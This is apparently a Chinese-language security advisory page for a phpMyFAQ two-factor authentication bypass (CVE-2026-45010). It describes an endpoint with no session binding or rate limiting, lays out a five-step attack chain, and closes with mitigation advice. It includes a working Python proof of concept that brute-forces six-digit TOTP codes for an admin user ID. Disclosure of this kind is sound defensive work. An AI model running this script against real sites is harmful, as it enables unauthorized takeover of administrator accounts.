CVE-2026-45010 CVSS 9.1 严重

CVE-2026-45010 phpMyFAQ认证绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45010

漏洞类型

认证绕过

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

phpMyFAQ

漏洞概述

phpMyFAQ 4.1.2之前的版本在/admin/check端点存在对过多认证尝试限制不当的漏洞。该端点接受任意用户ID参数，且缺乏会话绑定和速率限制。未经身份验证的攻击者可以通过发送带有顺序令牌值的POST请求，暴力破解任何用户的六位TOTP验证码，从而绕过双因素认证并获得完全的管理员访问权限。

技术细节

该漏洞的核心在于phpMyFAQ 4.1.2之前版本中的`/admin/check`接口存在严重的逻辑缺陷。该接口用于验证用户的TOTP双因素认证代码，但在实现上存在两个关键问题：一是缺乏会话绑定，即验证端点不检查请求是否来自已建立的合法会话，允许未认证的匿名用户直接调用；二是未实施速率限制，这使得攻击者可以在极短时间内发送海量请求而不被阻断。

攻击者利用此漏洞的原理相对简单但极具破坏性。由于TOTP代码通常仅为6位数字，组合空间仅为1,000,000种可能。攻击者只需编写脚本，构造包含目标管理员用户ID和顺序递增的TOTP值的POST请求发送至`/admin/check`。通过暴力穷举，攻击者最终会命中正确的验证码。一旦验证成功，系统即认为通过了两因素认证，从而赋予攻击者完全的管理员访问权限，完全绕过了旨在保护账户安全的第二道防线。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站运行的是phpMyFAQ 4.1.2之前的版本。

STEP 2

探测

攻击者确认/admin/check端点存在，且无需预先登录即可访问。

STEP 3

武器化

攻击者准备自动化脚本，用于生成000000到999999之间的TOTP验证码序列。

STEP 4

利用

攻击者向/admin/check端点发送大量POST请求，尝试暴力破解管理员账户的TOTP验证码。

STEP 5

权限提升

一旦正确的TOTP验证码被服务器接受，攻击者绕过2FA认证，获得管理员后台完全访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-site/admin/check"
user_id = "1"
headers = {
    "User-Agent": "PoC-Scanner/1.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

print(f"[*] Starting brute force for user {user_id}...")

# Iterate through all 6-digit combinations
for code in range(1000000):
    totp_code = f"{code:06d}"
    data = {
        "userid": user_id,
        "totp": totp_code
    }

    try:
        # Send POST request to the vulnerable endpoint
        response = requests.post(target_url, data=data, headers=headers, timeout=2)
        
        # Check response for indicators of success (e.g., 200 OK with specific text or redirect)
        # Adjust condition based on actual application response
        if response.status_code == 200 and "success" in response.text.lower():
            print(f"[+] Valid TOTP code found: {totp_code}")
            print(f"[+] Admin access granted!")
            break
        elif response.status_code == 302:
            print(f"[+] Potential success with 302 Redirect using code: {totp_code}")
            break
            
    except requests.exceptions.RequestException:
        pass

    if code % 10000 == 0:
        print(f"[*] Progress: {code} codes tested.")

影响范围

phpMyFAQ < 4.1.2

防御指南

临时缓解措施

如果无法立即升级，建议在网络层面（如防火墙或反向代理）阻断外部对/admin/check路径的访问，或仅允许受信任的内部IP访问。同时，建议管理员加强账户监控，检查是否存在异常的登录尝试记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表